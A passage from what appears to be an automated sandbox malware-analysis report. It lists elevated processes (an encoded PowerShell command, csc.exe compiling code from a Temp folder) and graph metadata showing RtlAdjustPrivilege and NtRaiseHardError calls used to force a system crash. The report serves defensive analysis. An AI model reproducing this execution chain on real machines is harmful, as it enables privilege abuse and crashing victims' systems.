                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:74
                      Start time:08:51:37
                      Start date:05/10/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c exit 45
                      Imagebase:0x7ff6eb690000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:75
                      Start time:08:51:38
                      Start date:05/10/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell -e 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
                      Imagebase:0x7ff6e3d50000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:76
                      Start time:08:51:39
                      Start date:05/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
                      Imagebase:0x7ff694fb0000
                      File size:2'759'232 bytes
                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:77
                      Start time:08:51:39
                      Start date:05/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
                      Imagebase:0x7ff715010000
                      File size:52'744 bytes
                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true


                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:50%
                        Total number of Nodes:6
                        Total number of Limit Nodes:0
                        Execution graph nodes: 7ffd34575b94 -> 7ffd34575b9d (NtRaiseHardError) -> 7ffd34575c7d; 7ffd34575a42 -> 7ffd34575ae3 (RtlAdjustPrivilege) -> 7ffd34575b5c

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID: ErrorHardRaise
                        • String ID:
                        • API String ID: 435474256-0
                        • Opcode ID: 3a66caa4baf822c01b898d50a4ab67a22592a02f0bcff3038cdb9ca78cb6b66a
                        • Instruction ID: 602430019ebad4a983c9290cc1549ddb0b064bd285fd1a28e438aaf82464ba55
                        • Opcode Fuzzy Hash: 3a66caa4baf822c01b898d50a4ab67a22592a02f0bcff3038cdb9ca78cb6b66a
                        • Instruction Fuzzy Hash: AC31E93191CB488FDB18DF58DC46AE9BBE0FB99325F04426FE049D3252CA746446CB92

                        Control-flow Graph

                        Control-flow graph blocks: 7ffd34575a42-7ffd34575b5a (RtlAdjustPrivilege) -> 7ffd34575b62-7ffd34575b8f, with fall-through block 7ffd34575b5c -> 7ffd34575b62
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID: AdjustPrivilege
                        • String ID:
                        • API String ID: 3260937286-0
                        • Opcode ID: 54eb9b25c9bca131cf9b26a64a5eccc4bfd3da1948cca4567f5b9db0830808e9
                        • Instruction ID: 5c28e8eb50cd964a2269891336f95d8c5ff7172880845ec1a461799215eb15a3
                        • Opcode Fuzzy Hash: 54eb9b25c9bca131cf9b26a64a5eccc4bfd3da1948cca4567f5b9db0830808e9
                        • Instruction Fuzzy Hash: B851233040E7C44FC70B8BA898556E97FF1EF57220F0942AFD089C70A3C669584AC752

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,L_^$-L_^
                        • API String ID: 0-2978936201
                        • Opcode ID: d15f09e6f926ec13aea49ea9a31173ce2c869a72b84de58f7272be54ff2cc921
                        • Instruction ID: dd0ad7067ad2bbefb515a21898b06f67f8522adfecc1d2d578d14156be08bd3a
                        • Opcode Fuzzy Hash: d15f09e6f926ec13aea49ea9a31173ce2c869a72b84de58f7272be54ff2cc921
                        • Instruction Fuzzy Hash: 89515457E0D6D61AEB6357381CF50DA3FD4DF23268B0991F3C694CE1A3AD0C684BA252